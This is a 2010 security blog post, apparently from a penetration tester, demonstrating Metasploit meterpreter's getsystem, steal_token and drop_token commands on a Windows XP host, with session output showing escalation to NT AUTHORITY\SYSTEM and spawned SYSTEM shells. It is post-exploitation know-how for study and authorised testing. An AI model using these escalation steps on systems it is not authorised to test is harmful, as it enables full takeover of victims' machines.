Friday, January 29, 2010

metasploit getsystem command

/
/
Shiny new hotness...

meterpreter > getuid
Server username: WINXPSP3\user **user is an admin, if not admin you can only use -t 4 or -t 0 which will iterate through all options**

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 2
...got system (via technique 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 3
...got system (via technique 3).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Hey I want user back!

meterpreter > getsystem -t 4
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

steal_token

meterpreter > steal_token -h
[-] Usage: steal_token [pid]

meterpreter > ps

Process list
============

PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
660 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
832 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1000 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1048 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1088 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1440 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
540 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
980 wscntfy.exe x86 WINXPSP3\user C:\WINDOWS\system32\wscntfy.exe
1360 wuauclt.exe x86 WINXPSP3\user C:\WINDOWS\system32\wuauclt.exe
2004 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
2000 ctfmon.exe x86 WINXPSP3\user C:\WINDOWS\system32\ctfmon.exe
960 WINWORD.EXE x86 WINXPSP3\user C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe

meterpreter > steal_token 1560
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > shell <--now uses -t by default Process 1272 created. Channel 2 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
WINXPSP3\user
C:\Documents and Settings\user>

wait I want a SYSTEM shell again

meterpreter > drop_token
Relinquished token, now running as: WINXPSP3\user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 856 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM

C:\Documents and Settings\user>

or call execute without -t to use your process token

meterpreter > execute -f cmd.exe -i -c -H
Process 676 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM

C:\Documents and Settings\user>
/
/
,
CG

2 comments:

Stepan Ilyin said...

How is it possible?

Is it public available?

January 29, 2010 at 4:20 PM
CG said...

svn up!

January 29, 2010 at 6:42 PM

Post a Comment

Subscribe to: Post Comments (Atom)

Copyright 2023 © Carnal0wnage Blog